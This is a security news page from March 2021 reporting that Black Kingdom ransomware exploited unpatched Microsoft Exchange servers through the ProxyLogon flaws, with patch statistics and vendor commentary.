Security News > 2021 > March > Black Kingdom Ransomware Hunting Unpatched Microsoft Exchange Servers

More than a week after Microsoft released a one-click mitigation tool to mitigate cyberattacks targeting on-premises Exchange servers, the company disclosed that patches have been applied to 92% of all internet-facing servers affected by the ProxyLogon vulnerabilities.
According to telemetry data from RiskIQ, there are roughly 29,966 instances of Microsoft Exchange servers still exposed to attacks, down from 92,072 on March 10.
While Exchange servers were under assault by multiple Chinese-linked state-sponsored hacking groups prior to Microsoft's patch on March 2, the release of public proof-of-concept exploits fanned a feeding frenzy of infections, opening the door for escalating attacks like ransomware and hijacking web shells planted on unpatched Microsoft Exchange servers to deliver cryptominers and other malware.
"To make matters worse, proof-of-concept automated attack scripts are being made publicly available, making it possible for even unskilled attackers to quickly gain remote control of a vulnerable Microsoft Exchange Server," cybersecurity firm F-Secure noted in a write-up last week.
Cybersecurity firm Sophos' analysis of Black Kingdom paints the ransomware as "Somewhat rudimentary and amateurish in its composition," with the attackers abusing the ProxyLogon flaw to deploy a web shell, utilizing it to issue a PowerShell command that downloads the ransomware payload, which encrypts the files and demands a bitcoin ransom in exchange for the private key.
"The Black Kingdom ransomware targeting unpatched Exchange servers has all the hallmarks of being created by a motivated script-kiddie," Mark Loman, director of engineering at Sophos, said.
News URL
http://feedproxy.google.com/~r/TheHackersNews/~3/9gpZG_Qu02c/black-kingdom-ransomware-hunting.html
Related news
- Hackers exploit Cityworks RCE bug to breach Microsoft IIS servers (source)
- Microsoft fixes bug causing Windows Server 2025 boot errors (source)
- Microsoft's End of Support for Exchange 2016 and 2019: What IT Teams Must Do Now (source)
- Microsoft Teams tactics, malware connect Black Basta, Cactus ransomware (source)
- US seizes domain of Garantex crypto exchange used by ransomware gangs (source)
- International cops seize ransomware crooks' favorite Russian crypto exchange (source)
- Like whitebox servers, rent-a-crew crime 'affiliates' have commoditized ransomware (source)
- Microsoft: North Korean hackers join Qilin ransomware gang (source)
- Microsoft Exchange Online outage affects Outlook web users (source)
- Microsoft: Exchange Online bug mistakenly quarantines user emails (source)